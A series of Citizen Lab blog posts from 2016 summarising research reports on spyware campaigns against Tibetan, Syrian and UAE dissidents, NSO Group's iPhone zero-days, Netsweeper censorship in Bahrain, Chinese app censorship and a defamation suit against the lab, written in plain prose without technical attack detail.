Just Enough to Do the Job: Targeted Attacks on Tibetans

I am pleased to announce a new Citizen Lab report, entitled “It’s Parliamentary: KeyBoy and the targeting of the Tibetan Community.” The report is authored by the Citizen Lab’s Adam Hulcoop, Etienne Maynier, John Scott Railton, Masashi Crete-Nishihata, and Matt Brooks and can be found here: https://citizenlab.org/2016/11/parliament-keyboy/

In this report, the authors track a malware operation targeting members of the Tibetan Parliament over August and October 2016.  The operations involved highly targeted email lures with repurposed content and attachments that contained an updated version of custom backdoor known as “KeyBoy.”

There are several noteworthy parts of this report:

First, this operation is another example of a threat actor using “just enough” technical sophistication to exploit a target.  A significant amount of resources go into a targeted espionage operation, from crafting of an exploit to its packaging and delivery to the intended target, to the command and control infrastructure, and more.  From the perspective of an operator, why risk burning some of these precious resources when something less sophisticated will do? Throughout the many years we have been studying targeted digital attacks on the Tibetan community, we have seen operators using the same old patched exploits because … well, they work.

Part of the reason these attacks work is that the communities in question typically do not have the resources or capabilities to protect their networks properly.  While the Tibetan diaspora has done a remarkable job educating their community about how to recognize a suspicious email or attachment and not open it (their Detach from Attachments campaign being one example) many of them are still reliant on un-patched operating systems and a lack of adequate digital security controls.  As Citizen Lab’s Adam Hulcoop remarked, “We found it striking that the operators made only the bare minimum technical changes to avoid antivirus detection, while sticking with ‘old day’ exploits that would not work on a patched and updated system.”

What goes for Tibetans holds true across the entire civil society space: NGOs are typically small, overstretched organizations; most have few resources to dedicate to doing digital security well.  As a consequence, operators of targeted espionage campaigns can hold their big weapons in reserve, put more of their effort into crafting enticing messages — into the social engineering part of the equation — while re-purposing older exploits like KeyBoy.  As Citizen Lab senior researcher John Scott Railton notes in a recent article, “Citizen Lab research has consistently found that although the overall technical sophistication of attacks is typically low, their social engineering sophistication is much higher.”  The reason is that civil society is “chronically under-resourced, often relying on unmanaged networks and endpoints, combined with extensive use of popular online platforms….[providing] a target-rich environment for attackers.”

The second noteworthy part of the report concerns the precision around the social engineering on the part of the operators. The attacks were remarkably well timed to maximize return on victims.  Just 15 hours after members of the Tibetan parliament received an email about an upcoming conference, they received another email with the same subject and attachment, this time crafted to exploit a vulnerability in Microsoft Office using KeyBoy.  This level of targeting and re-use of a legitimate document sent only hours before shows how closely the Tibetans are watched by their adversaries, and how much effort the operators of such attacks put into the social engineering part of the targeted attack.  With such persistence and craftiness on the part of threat operators, it is no wonder civil society groups are facing an epidemic of these type of campaigns.

Finally, the report demonstrates the value of trusted partnerships with targeted communities.  The Citizen Lab has worked with Tibetan communities for nearly a decade, and during that time we have learned a great deal from each other.  That they are willing to share samples of attacks like these with our researchers shows not only their determination to better protect themselves, but a recognition of the value of careful evidence-based research for their community.  By publishing this report, we hope that civil society, human rights defenders, and their sponsors and supporters can better understand the threat environment, and take steps to protect themselves.  

To that end, alongside the report, we are publishing extensive details and indicators of compromise in several appendices to the report, and hope other researchers will continue where we left off.

Read the report here: https://citizenlab.org/2016/11/parliament-keyboy/

What Lies Beneath China’s Live-Streaming Apps?

Today, the Citizen Lab is releasing a new report, entitled: “Harmonized Histories? A year of fragmented censorship across Chinese live streaming platforms.”  The report is part of our NetAlert series, and can be found here.

Live-streaming media apps are extraordinarily popular in mainland China, used by millions.  Similar in functionality to the US-based and Twitter-owned streaming media app, Periscope (which is banned in China) China-based apps like YY, 9158, and Sina Show, have become a major Internet craze.  Users of these apps share everything from karaoke and live poker matches to pop culture commentary and voyeuristic peeks into their private lives.  For example, Zhou Xiaohu, a 30-year-old construction worker from Inner Mongolia, films himself eating dinner and watching TV, while another live-streamer earns thousands of yuan taking viewers on tours of Japan’s red-light districts.

The apps are also big business opportunities, for both users and the companies that operate them.  Popular streamers receive virtual gifts from their fans, who can number in the hundreds of thousands for some of the most widely viewed. The streamers can exchange these virtual gifts for cash.  Some of them have become millionaires as a result. The platforms themselves are also highly lucrative, attracting venture capital and advertisement revenues.

Chinese authorities have taken notice of the exploding live-streaming universe, which is not surprising considering their strict concerns over free expression.  Occasionally streams will veer into taboo topics, such as politics or pornography, which has resulted in more scrutiny, fines, takedowns, and increased censorship.

To better understand how censorship on the platforms takes place, our researchers downloaded three of the most popular applications (YY, 9158, and Sina Show) and systematically reverse engineered them.   Doing so allowed us to extract the banned keywords hidden in the clients as they are regularly updated.  Between February 2015 and October 2016, we collected 19,464 unique keywords that triggered censorship on the chats associated with each application, which we then translated, analyzed, and categorized.

What we found is interesting for several reasons, and runs counter to claims put forth in a widely-read study on China’s Internet censorship system authored by Gary King et al and published in the American Political Science Review.  In that study, King and his colleagues conclude that China’s censors are not concerned with “posts with negative, even vitriolic, criticism of the state, its leaders, and its policies” and instead focus predominantly on “curtailing collective action by silencing comments that represent, reinforce, or spur social mobilization, regardless of content.”  Their analysis gives the impression of a centralized and monolithic censorship system to which all Internet providers and companies strictly conform.

We found, on the other hand, that there is significant variation in blocking across the platforms.  This variation means that while the Chinese authorities may set general expectations of taboo or controversial topics to be avoided, what, exactly, to filter is left to the discretion of the companies themselves to implement.

We also found, contrary of King et al, that content they suggested was tolerated was actually routinely censored by the live-streaming companies, albeit in inconsistent ways across each of the platforms.  We also found all sorts of keywords targeted for filtering that had nothing to do with political directives, including censoring of posts by live-streaming applications related to their business competitors.

In other words, our research shows that the social media ecosystem in China — though definitely restricted for users — is more decentralized, variable, and chaotic than what King and his colleagues claim. It confirms the role of intermediary liability in China that Rebecca Mackinnon has put forward, known as “self discipline,” whereby companies are expected to police themselves and their users to ensure a “harmonious and healthy Internet.”  Ironically, that self-discipline often results in entirely different implementations of censorship on individual platforms, and a less than “harmonious” Internet experience as a result.

Our reverse engineering also discovered that YY — the most popular of the live-streaming apps, with over 844 million registered users — undertakes surveillance of users’ chats. When a censored keyword is entered by a user, a message is sent back to YY’s servers that includes the username of who sent the message, the username of who received the message, the keyword that triggered censorship, and the entire triggering message. Nearly a billion unwitting users’ chats subject to hidden keyword surveillance!  Recall that in China companies are required to share user information with security agencies upon request, and Chinese citizens have been arrested based entirely on their online actions.  Recently, for example, one user posted an image of a police report of a person under investigation for downloading a VPN on his or her mobile phone.

On a more technical level, our research shows the value of careful reverse engineering for revealing information controls hidden from the view of the typical user.  The keyword lists we extracted and are publishing reveal exactly what content triggers censorship and surveillance, something that is known only to the decision makers within the companies themselves.  We see this type of research as critical to informing users of the ecosystem within which they communicate.

Sometimes what we find also runs counter to conventional wisdom.  You don’t know what’s being censored if you can’t see the list of banned keywords. Opening these applications up allows us to see them from the inside-out in a truly unbiased way that other more impressionistic scans can only infer.

What an “MRI of the Internet” Can Reveal: Netsweeper in Bahrain

I am pleased to announce a new Citizen Lab report: “Tender Confirmed, Rights At Risk: Verifying Netsweeper in Bahrain.”  The full report can be found here: https://citizenlab.org/2016/09/tender-confirmed-rights-risk-verifying-netsweeper-bahrain

Internet censorship is a major and growing human rights issue today. Access to content is restricted for users on social media, like Facebook, on mobile applications, and on search engines.  The most egregious form of censorship, however, is that which occurs at a national level for entire populations.  This type of censorship has been spreading for many years, and now has become normalized across numerous countries.

One of the Citizen Lab’s longest standing forms of research is the meticulous documentation of Internet censorship.  We were one of the founding partners of the OpenNet Initiative, which at one time documented Internet filtering and surveillance in more than 70 countries on an annual basis. We continue this research in the form of country case studies or analyses of information controls around specific events, like a civil war.

At the core of this research is the use of a mixture of technical interrogation and network measurements methods, including in-country testing, remote scans of national networks, queries on databases, and large-area scans of the entire Internet.  One of the methods we use in this research is a scanning tool called Zmap, which we run on high-speed computers to perform a complete scan of the entire Internet space in a matter of minutes.  Think of this technique as an MRI of the Internet.

A byproduct of these scans is the ability to identify equipment that is used to undertake Internet censorship and surveillance. Certain filtering systems have the equivalent of digital signatures which we use when scanning the Internet. Searching for these signatures allows us to locate installations around the world. Doing so is useful in and of itself to help shed a light on what’s going on beneath the surface of the Internet. But it is also useful for raising awareness about the companies that are complicit in Internet censorship practices.

One of the companies that we have identified in this way is Netsweeper, Inc, a Canadian company based in Waterloo, Ontario. We have identified Netsweeper installations being used to filter at the national level in Pakistan, Somalia, and Yemen, among others.  Our latest report, published today, locates live Netsweeper installations on nine ISPs in the Kingdom of Bahrain.

These findings are significant for several reasons: Bahrain is one of the world’s worst countries for respect for human rights, particularly press and Internet freedoms.  For many years, Bahrain has restricted access to Internet content having to do with independent media, websites critical of the Kingdom, and content related to the Shia faith, which is heavily persecuted in Bahrain.

In January 2016, Bahrain issued a tender for bidding on a national-level Internet filtering system. Our findings are significant because we can confirm the presence of Netsweeper installations on Bahraini ISPs following the bid.

These findings are also noteworthy because Netsweeper filed, and then discontinued a $3.5 million defamation suit against myself and the University of Toronto following our prior report on Netsweeper in Yemen.   Our report published today is the first since the defamation suit was discontinued by Netsweeper. As we have done with prior reports, we sent Netsweeper a letter, which can be found here, in which we lay out our findings, ask Netsweeper questions about their due diligence and corporate social responsibility policies, and offer to publish their response in full alongside our report. As of today, Netsweeper has not replied to that letter.

Lastly, the case is significant because Netsweeper is a Canadian company, and the provision of Internet filtering services to a country like Bahrain— though not in violation of any Canadian law per se — is definitely being used to suppress content deemed legitimate expression under international human rights law, which Canada explicitly supports.  All the more troubling, then, is the fact that Netsweeper has benefited, and will benefit in the future, from tangible support provided by both the Canadian and the Ontario governments in trade shows held in the Gulf region.  Canada’s Trade Commissioner says the government’s involvement at these trade shows includes assistance with “business-to-business meetings” and “networking events” as well as provision of a “pavilion/exhibit” — all of which is “offered free of charge to Canadian companies and organizations.”  While we have no evidence Canada went so far as to facilitate Netsweeper’s specific bid on Bahrain’s tender, they certainly did use Canadian tax payers dollars to represent Netsweeper to interested clients in the region.

Should the government of Canada be promoting a company whose software is used to violate human rights and which offers services in direct contradiction to our stated foreign policy goals on cyberspace?   Perhaps a more harmonized approach would be to require companies like Netsweeper to have some explicit corporate social responsibility process in place.  Export controls could be established that restrict the sale of technology and services to countries that will use their product to infringe internationally-recognized human rights.  Taking these steps would help better synchronize Canada’s economic and human rights policies while also bringing the world of Internet filtering in line with widely recognized principles on how businesses should respect human rights.

Disarming a Cyber Mercenary, Patching Apple Zero Days

I am pleased to announce a new Citizen Lab report: “The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender,” authored by senior researchers Bill Marczak and John Scott Railton.

If you are one of hundreds of millions of people that own an iPhone, today you will receive a critical security patch.  While updating your software, you should pause for a moment to thank human rights activist, Ahmed Mansoor.

Mansoor is a citizen of the United Arab Emirates, and because he’s a human rights activist in an autocratic country his government views him as a menace.  For security researchers at the Citizen Lab, on the other hand, Mansoor’s unfortunate experiences are the gift that won’t stop giving.

Mansoor is an outspoken defendant of human rights, civil liberties, and free expression in a country that routinely flouts them all. While he has been praised internationally for his efforts — in 2015, Mansoor was given the prestigious Martin Ennals Award for Human Rights Defenders — his government has responded with imprisonment, beatings, harassment, a travel ban…and persistent attempts to surreptitiously spy on his digital communications.

For example, in 2011 Mansoor was sent a PDF attachment that was loaded with a sophisticated spyware manufactured by the British / German company, Gamma Group.  Fortunately, he decided not to open it.

In 2012, he was targeted with more spyware, this time manufactured by an Italian company, Hacking Team.  His decision to share that sample with Citizen Lab researchers led to one of our first detailed reports on the commercial spyware trade.

And so earlier this month, when Mansoor received two unsolicited SMS messages on his iPhone 6 containing links about “secrets” concerning detainees in UAE prisons, he thought twice about clicking on them.  Instead, he forwarded them to us for analysis. It was a wise move. 

Citizen Lab researchers, working in collaboration with the security company Lookout, found that lurking behind those SMS messages was a series of “zero day” exploits (which we call “The Trident”) designed to take advantage of unpatched vulnerabilities in Mansoor’s iPhone. 

To say these exploits are rare is truly an understatement.  Apple is widely renown for its security — just ask the FBI.  Exploits of its operating system run on the order of hundreds of thousands of dollars each.  One company that resells zero days paid $1 million dollars for the purchase of a single iOS exploit, while the FBI reportedly paid at least $1.3 million for the exploit used to get inside the San Bernadino device.  The attack on Mansoor employed not one but three separate zero day exploits.

Had he followed those links, Mansoor’s iPhone would have been turned into a sophisticated bugging device controlled by UAE security agencies. They would have been able to turn on his iPhone’s camera and microphone to record Mansoor and anything nearby, without him being wise about it. They would have been able to log his emails and calls — even those that are encrypted end-to-end. And, of course, they would have been able to track his precise whereabouts.

Through careful, detailed network analysis, our team (led by Bill Marczak and John Scott Railton) was able to positively link the exploit infrastructure behind these exploits to an obscure company called “NSO Group”. 

Don’t look for them online; NSO Group doesn’t have a website. They are an Israeli-based “cyber war” company owned by an American venture capital firm, Francisco Partners Management, and founded by alumni of the infamous Israeli signals intelligence agency, Unit 8200.  This unit is among the most highly ranked state agencies for cyber espionage, and is allegedly responsible (along with the U.S. NSA) for the so-called “Stuxnet” cyber attack on Iran’s nuclear enrichment facilities.

In short: we uncovered an operation seemingly undertaken by the United Arab Emirates using the services and technologies of an Israeli “cyber war” company who used precious and very expensive zero day iOS exploits to get inside an internationally-renowned human rights defender’s iPhone.

That’s right: Not a terrorist. Not ISIL. A human rights defender.

(An important aside: we also were able to identify what we suspect are at least two other NSO Group-related targeted digital attack campaigns: one involving an investigative journalist in Mexico, and the other a tweet related to an opposition politician in Kenya).

Once we realized what we had uncovered, Citizen Lab and Lookout contacted Apple with a responsible disclosure concerning the zero days.   

Our full report is here.

Apple responded immediately, and we are releasing our report to coincide with their public release of the iOS 9.3.5 patch.

That a country would expend millions of dollars, and contract with one of the world’s most sophisticated cyber warfare units, to get inside the device of a single human rights defender is a shocking illustration of the serious nature of the problems affecting civil society in cyberspace.  This report should serve as a wake-up call that the silent epidemic of targeted digital attacks against civil society is a very real and escalating crisis of democracy and human rights.

What is to be done?  Clearly there is a major continuing problem with autocratic regimes abusing advanced interception technology to target largely defenceless civil society organizations and human rights defenders.   The one solution that has been proposed by some — export controls on items related to “intrusion software” — appears to have had no effect curbing abuses. In fact, Israel has in place export controls ostensibly to prevent this very sort of abuse from happening. But something obviously slipped through the cracks…

Maybe it is time to explore a different strategy — one that holds the companies directly responsible for the abuse of their technologies.  It is interesting in this respect that NSO Group masqueraded some of its infrastructure as government, business, and civil society websites, including the International Committee for the Red Cross, Federal Express, Youtube, and Google Play. 

Isn’t that fraud against the user? Or a trademark violation? If not considered so now, maybe it should be.

Meanwhile, please update your iPhone’s operating system, and while you’re doing it, spare a thought for Ahmed Mansoor.

All iPhone owners should update to the latest version of iOS immediately. If you’re unsure what version you’re running, you can check Setting > General > About > Version.

Communicating Privacy and Security Research: A Tough Nut to Crack

Today at the Citizen Lab we released a new report on (yet more) privacy and security issues in UC Browser, accompanied by a new cartoon series, called Net Alert.

Our new UC Browser report, entitled “A Tough Nut to Crack,” and authored by Jeffrey Knockel, Adam Senft and me, is our second close-up examination of UC Browser, which is by some estimates the second most popular mobile browser application in the world.   In our first analysis of UC Browser, undertaken in 2015, we discovered several major privacy and security vulnerabilities that would seriously expose users of UC Browser to surveillance and other privacy violations.  We were tipped off to look at UC Browser while going through some of the Edward Snowden disclosures and discovered the NSA, CSE and other SIGINT partners were patting themselves on the back for exploiting data leaks and faulty update security related to UC Browser.   I wrote an oped at the time discussing the security tradeoffs involved in keeping knowledge of software flaws like this quiet, and how we need a broader public discussion about software vulnerability disclosures.

We decided to take a second look at UC Browser, this time led by Jeffrey Knockel.  By reverse engineering several versions of UC Browser, Jeffrey was able to determine the likely version number of UC Browser referenced in the Snowden disclosure slides, and which led the NSA to develop an XKeyscore plugin for UC Browser exploitation.  We also found that all versions of the browser examined — Windows and Android — transmit personal user data with easily decryptable encryption, and the Windows version does not properly secure its software update process, leaving it vulnerable to arbitrary code execution.  We disclosed our findings to Alibaba, the parent company, and report back on their responses and fixes, such as they are, in an appendix to the report. 

Communicating these risks to users is not always easy, as the details are very technical and can be confusing.  To help better communicate privacy and security research to a broader audience,  we co-timed the release of our new UC Browser report with the first in a series of cartoons and info-nuggets on digital security, called “Net Alert.”   The first Net Alert features two informative and funny cartoons by Hong Kong artist Jason Li, each of which tells a story about the risks of using UC Browser.  The Net Alert series also includes background information on digital security topics, like the risks of “man-in-the-middle” attacks and of using open WiFi networks.   (Net Alert is produced by Citizen Lab in collaboration with Open Effect and the University of New Mexico).  We will be producing more of these Net Alert cartoons and info-nuggets co-timed with future Citizen Lab reports.  Our hope is that by communicating privacy and digital security risks in a friendly and accessible way, more people will be inclined to take small steps to better protect themselves against exposure and learn more about the research we undertake.

The UC Browser report is but one in an ongoing research series on mobile privacy and security.  For those who are interested, we have also published a FOCI paper, which we are presenting this week at the 2016 USENIX Free and Open Communications on the Internet workshop , that summarizes our technical analysis of the security and privacy vulnerabilities in three web browsers developed by China’s three biggest web companies: UC Browser, QQ Browser and Baidu Browser; developed by UCWeb (owned by Alibaba), Tencent and Baidu, respectively.

The Iranian Connection

Today, the Citizen Lab is publishing a new report, authored by the Citizen Lab’s John Scott-Railton, Bahr Abdulrazzak, Adam Hulcoop, Matt Brooks, and Katie Kleemola of Lookout, entitled “Group 5: Syria and the Iran Connection.”

The full report is here: https://citizenlab.org/2016/08/group5-syria/

Associated Press has an exclusive report here: http://bigstory.ap.org/article/6ab1ab75e89e480a9d12befd3fea4115/experts-iranian-link-attempted-hack-syrian-dissident

And, I wrote an oped for the Washington Post about our report, which can be found here:  https://www.washingtonpost.com/posteverything/wp/2016/08/02/how-foreign-governments-spy-using-email-and-powerpoint/

This report describes an elaborately staged malware operation with targets in the Syrian opposition. We first discovered the operation in late 2015 when a prominent member of the Syrian opposition, Noura Al-Ameera, spotted a suspicious e-mail containing a PowerPoint slideshow purporting to show evidence of “Assad crimes.”  Rather than open it, Al-Ameera wisely forwarded it to us at the Citizen Lab for further analysis.  Upon investigation, we determined the PowerPoint was laden with spyware.

Following that initial lead, our researchers spent several months engaged in careful network analysis, reverse engineering, and mapping of the command and control infrastructure.  Although we were not able to make a positive attribution to a single government (a common issue in cyber espionage investigations), we were able to determine that behind the targeted attack on Noura Al-Ameera is a new espionage group operating out of Iranian Internet space, possibly a privateer and likely working for either the Syrian or Iranian governments (or both).

Citizen Lab has tracked four separate malware campaigns that have targeted the Syrian opposition since the early days of the conflict: Assad regime-linked malware groups, the Syrian Electronic Army, ISIS, and a group with ties to Lebanon. Our latest report adds one more threat actor to the list, which we name “Group5” (to reflect the four other known malware groups) with ties to Iran.

The report demonstrates yet again that civil society groups are persistently targeted by digital malware campaigns, and that their reliance on shared social media and digital mobilization tools can be a source of serious vulnerability when exploited by operators using clever social engineering methods.

On Research in the Public Internet

This post is cross posted from https://citizenlab.org/2016/07/research-interest/

On January 20, 2016, Netsweeper Inc., a Canadian Internet filtering technology service provider, filed a defamation suit with the Ontario Superior Court of Justice. The University of Toronto and myself were named as the defendants. The lawsuit in question pertained to an October 2015 report of the Citizen Lab, “Information Controls during Military Operations: The case of Yemen during the 2015 political and armed conflict,” and related comments to the media. Netsweeper sought $3,000,000.00 in general damages; $500,000.00 in aggravated damages; and an “unascertained” amount for “special damages.”

On April 25, 2016, Netsweeper discontinued its claim in its entirety.

Between January 20, 2016 and today, we chose not to speak publicly about the lawsuit. Instead, we spent time preparing our statement of defence and other aspects of what we anticipated would be full legal proceedings.

Now that the claim has been discontinued it is a good opportunity to take stock of what happened, and make some general observations about the experience.

It should be pointed out that this is not the first time a company has contemplated legal action regarding the work of the Citizen Lab. Based on emails posted to Wikileaks from a breach of the company servers, we know that the Italian spyware vendor, Hacking Team, communicated with a law firm to evaluate whether to “hit [Citizen Lab] hard.” However, it is the first time that a company has gone so far as to begin litigation proceedings. I suspect it will not be the last.

Fortunately, Ontario has recognized the importance of protecting and encouraging speech on matters of public interest. Canada has historically proven a plaintiff-friendly environment for defamation cases. But, on November 3, 2015, the legal landscape shifted in Ontario when a new law called the Protection of Public Participation Act (PPPA) came into force. It was specifically designed to mitigate against “strategic litigation against public participation,” or SLAPP suits. The Act enumerates its purposes as:

(a) to encourage individuals to express themselves on matters of public interest;

(b) to promote broad participation in debates on matters of public interest;

(c) to discourage the use of litigation as a means of unduly limiting expression on matters of public interest; and

(d) to reduce the risk that participation by the public in debates on matters of public interest will be hampered by fear of legal action.

Under the Act, a judge may dismiss a defamation proceeding if “the person satisfies the judge that the proceeding arises from an expression made by the person that relates to a matter of public interest.” The Act allows for recovery of costs, and if, “in dismissing a proceeding under this section, the judge finds that the responding party brought the proceeding in bad faith or for an improper purpose, the judge may award the moving party such damages as the judge considers appropriate.”

In our view, the work of Citizen Lab to carefully document practices of Internet censorship, surveillance, and targeted digital attacks is precisely the sort of activity recognized as meriting special protection under the PPPA. Had our proceedings gone forward, we intended to exercise our rights under the Act and move to dismiss Netsw­eeper’s action.

Regardless of the status of the suit, we strenuously disagree with the claims made by Netsweeper, and stand firm in the conviction that my remarks to the media, and the report itself, are both clearly responsible communications on matters of public interest and fair comment as defined by the law.

One point bears underscoring: it is an indisputable fact that Citizen Lab tried to obtain and report Netsweeper’s side of the story. Indeed, we have always welcomed company engagement with us and the public at large in frank dialogue about issues of business and human rights. We sent a letter by email directly to Netsweeper on October 9, 2015. In that letter we informed Netsweeper of our findings, and presented a list of questions. We noted: “We plan to publish a report reflecting our research on October 20, 2015. We would appreciate a response to this letter from your company as soon as possible, which we commit to publish in full alongside our research report.”

Netsweeper never replied.

We expect that Citizen Lab research will continue to generate strong reaction from companies and other stakeholders that are the focus of our reports. The best way we can mitigate legal and other risk is to continue to do what we are doing: careful, responsible, peer-reviewed, evidence-based research. We will continue to investigate Netsweeper and other companies implicated in Internet censorship and surveillance, and we will continue to give those companies a chance to respond to our findings, and publish their responses, alongside our reports.

I come away from this experience profoundly appreciative of the skills of my staff and colleagues, and in particular Jakub Dalek, Sarah McKune, and Adam Senft, who assisted in the legal preparations.

Lastly, I am grateful to the University of Toronto for their support throughout this process. With corporate involvement in academia seemingly everywhere these days, it is tempting to get cynical about universities, and wonder whether corporate pressures will make university administrators lose sight of their core mission and purpose. After the experiences of the last few months, I feel optimistic about the possibilities of speaking truth to power with the protection of academic freedom that the University of Toronto has provided me.

Meanwhile, back to work on another Citizen Lab report.

The Week of Holding “Big Data” Accountable

The world of “Big Data,” “The Internet of Things,” or simply… “Cyberspace.”

Whatever we choose to call it, never in human history has something so profoundly consequential for so many people’s daily lives been unleashed in such a short period of time.  Certainly, the printing press, the telegraph, radio, the television, were all extraordinary.  But what is going on now is truly unprecedented in its sudden, dramatic impact.  In the span of a few short years, billions of citizens the world over are immersing themselves in an entirely new communications environment — one that is changing not only how we think and behave but, more profoundly, how society as a whole is fundamentally structured.  Information that previously was stored in our office drawers, in locked closets, in our diaries, even in our minds, we are now transmitting to thousands of private companies and, by extension, to government agencies.

This world of Big Data is a supernova of billions of human interactions, habits, movements, thoughts, and desires, ripe to be harvested, analyzed, and then fed back to us, in turn, to predict and shape us.  It should come as no surprise, given the rate at which this transformation is occurring, that there will be unintended — and possibly even seriously detrimental — consequences for privacy, liberty, and security.

Evidence of these consequences is now beginning to accumulate.  First, there are privacy issues. Data breaches that expose the email and password credentials of tens of millions of people have become so routine that researchers are now describing them as “megabreaches.” Our research at the Citizen Lab has shown how numerous popular mobile applications used by hundreds of millions of people routinely leak sensitive user information, including, in some cases, the geolocation of the user, device ID and serial number information, and lists of nearby wifi networks. We have discovered that some applications were so poorly secured, that anyone with control of a network to which these applications connects (e.g., a WiFi hotspot) could easily spoof a software update to install spyware onto an unwitting user’s device.  

Poorly designed mobile applications, such as those we have examined, are a goldmine for criminals and spies, and yet we surround ourselves with them. Disclosures of former National Security Agency (NSA) contractor Edward Snowden have shown that state intelligence agencies routinely vacuum up information leaked by applications in this way, and use the data for mass surveillance.  And what they don’t acquire from leaky applications, they get directly from the companies through lawful requests.  The confluence of interests around commercial and state surveillance is where Big Data meets Big Brother.

Beyond privacy issues are those of security. For example, researchers have demonstrated how they could use remote WiFi connections to take over the controls of a smart car or even an airline’s cockpit systems.  Others have shown proof of concept attacks against “smart home” systems that remotely cracked door lock codes, disabled vacation mode, and induced a fake fire alarm. Of course, what happens in the lab is but an omen of what’s to come in the real world. Several years ago, a computer virus called “Stuxnet” reportedly developed by the US and Israel, was used to sabotage Iranian nuclear enrichment plants.  Dozens of countries are reportedly researching and stockpiling their own Stuxnet like cyber weapons, which in turn is generating a huge commercial market for such hidden software flaws. Perversely adding to the insecurities (as the FBI Apple controversy showed us), some government agencies are, in fact, pressuring companies to weaken their systems by design to aid law enforcement and intelligence agencies.  As such insecurities mount, and as more and more of our critical infrastructure is networked, the Big Data environment in which we live may turn out to be a digital house of cards.

This past week, the Citizen Lab and our partners, Open Effect, produced several outputs and activities that related to concerns around privacy and security in the world of Big Data, including some that we hope can help mitigate some of these unintended consequences.

First, the Citizen Lab and Open Effect released a revamped version of the Access My Info tool, which allows Canadians to exercise their legal rights to ask companies about the data they collect on them, what they do with it, and with whom they share it.  I wrote an oped for the CBC about the tool, and there were several other media reports, including an interview by the CBC’s Metro Morning host Matt Galloway with Andrew Hilts of Citizen Lab and Open Effect.

Also, yesterday the CBC Ideas broadcast a special radio show on “Big Data Meets Big Brother,” in which I participated alongside Ann Cavoukian and Neil Desai, with Munk School director Stephen Toope moderating.  We discussed the balance between national security and privacy, and focused in on the limited oversight mechanisms that exist in Canada around security agencies, and especially the Communications Security Establishment (CSE).

Finally, Citizen Lab and Open Effect, as part of our Telecommunications Transparency Project, released a DIY Transparency Reporting Tool.  The tool is actually a software template that provides companies with a guide for developing transparency reports. To give some context for the tool, companies are increasingly encouraged to release public reports on the length of time client data is retained, how the data is used, and how often—and under what lawful authority—the data is shared with governments agencies.  The DIY Transparency Reporting Tool is the flipside of the Access My Info project:  whereas the latter encourages consumers to ask companies and governments about what they do with our data, the Transparency Reporting Tool provides companies with an easy-to-use template to take the initiative to report that information to us.

The world of Big Data has come upon us like a hurricane, with most consumers bewildered by what is happening to the data they routinely give away.  Meanwhile, companies are reaping a harvest of highly-personalized information to generate enormous profits, with very little public accountability around their conduct, or the design choices they make.  It’s time we encouraged consumers to “lift the lid” on the Big Data ecosystem right down to the algorithms that sort us and structure our choices, while simultaneously pressing companies to be more responsible stewards of our data.  Tools like “Access My Info” and the DIY Transparency Toolkit are a good first start.

A Stealth Falcon Quietly Snatches Its Twitter Prey

Today, the Citizen Lab is publishing a new report, entitled “Be Calm and (Don’t) Enable Macros: Malware Sent to UK Journalist Exposes New Threat Actor Targeting UAE Dissidents.” The report is authored by Citizen Lab senior researchers Bill Marczak and John Scott Railton, and details an extensive and highly elaborate targeted digital attack campaign, which we call “Stealth Falcon.” While we have no “smoking gun” (typical for cyber espionage) there is a lot of circumstantial evidence that strongly suggests the United Arab Emirates is responsible for Stealth Falcon.

The New York Times has an exclusive on the report, which can be found here http://www.nytimes.com/2016/05/30/technology/governments-turn-to-commercial-spyware-to-intimidate-dissidents.html?_r=0

Our full report is here: https://citizenlab.org/2016/05/stealth-falcon/

Journalists, activists — in fact, all of civil society — now depend on and have benefited from social media to conduct their campaigns and communicate with each other, and with confidential sources.  Yet that same dependence on social media has become a principal point of exposure and risk, exploited by criminals, intelligence agencies, and other adversaries determined to silence dissent. Our report offers a shocking exposé into just how elaborate and shifty these campaigns can be, and how serious the consequences are, for those ensnared in them.

The Stealth Falcon case begins when Rori Donaghy, a UK-based journalist and founder of the Emirates Center for Human Rights, received an email in November 2015, purporting to offer him a position on a human rights panel.  That email contained a malware-laden attachment from a phony organization. Donaghy has published extensively on abuses by the UAE government, including a series of articles based on leaked emails involving UAE government members.  Suspicious that something seemed awry, Donaghy made the wise move to share his email with Citizen Lab researcher, Bill Marczak.

Using a combination of reverse engineering, network scanning, and other highly intricate detective methods that are detailed in the report, Marczak (assisted by John Scott Railton) unearthed a vast campaign of digital attacks aimed at UAE dissidents, organized primarily through fake Twitter accounts, phony websites, and spoofed emails.  The attacks appear to have had extremely serious consequences: many dissidents targeted, and presumably entrapped by Stealth Falcon, disappeared into the clutches of UAE authorities and were reportedly tortured.

The United Arab Emirates is an autocratic regime that governs with strict regulations and harsh punishments.  Human Rights Watch’s 2016 UAE country report documents arbitrary arrests and forcible disappearances of regime critics.  Amnesty International says that “torture and other ill-treatment of detainees was common” in UAE prisons.   It is one of those countries that has for a long time strictly censored the Internet using technology developed by western companies; earlier Citizen Lab research found the services of a Canadian company, Netsweeper, are used by UAE ISPs to restrict access to content critical of the regime.  UAE has purchased “lawful intercept” surveillance systems from the notorious Finisher and Hacking Team intrusion software vendors, as we have documented in prior reports.  It is not yet clear whether what we call “Stealth Falcon” is something the UAE developed itself, or whether it’s part of some kind of commercial service.  Regardless, it is a nasty reminder of the way the harsh world of realpolitik actually manifests itself in cyberspace.

There are at least two broader lessons of the Stealth Falcon report. First, the careful, rigorous methods demonstrated by Bill Marczak and John Scott Railton are exemplary of the power of applying structured research techniques drawn from engineering and computer science to issues of human rights.  We hope other University-based research groups are inspired by this mixed methods approach, and emulate what we are doing around documenting targeted digital attacks.  The more this type of research is “normalized” in academia, the less likely abuses of the sort we are unearthing will go unnoticed.

Second, it is clear that autocratic regimes like the United Arab Emirates are now routinely finding ways to project their power through cyberspace by subverting the tools of social media to accomplish their sinister aims. Given that civil society is so deeply immersed in social media, it is imperative that they, and the companies that service them, urgently adapt to and mitigate these new threats. Doing so will require a more mature awareness of the risks that exist in cyberspace, what to be “on the lookout for” when it comes to those risks, and adjust behaviour accordingly.  Although there were many victims of Stealth Falcon, Donaghy himself was not among them thanks to his astute recognition that a pleasant, but out-of-the-blue, invitation seemed not quite right.

My conversation with Edward Snowden

Earlier this week, I was fortunate to have a lengthy conversation with Edward Snowden.  The chat was held at Rightscon and moderated by Access’ Amie Stephanovich, and it is archived at the RightsCon website here: https://www.youtube.com/watch?v=yGDqXokPGiE

We covered many topics, and I learned a great deal about Ed’s positions, and also his eloquence and passion.  It is clear he has deeply held and sophisticated perspectives on security, rights, and freedom.  It is remarkable that the person who is the world’s most important whistleblower in the history of intelligence also happens to be so thoughtful and articulate.

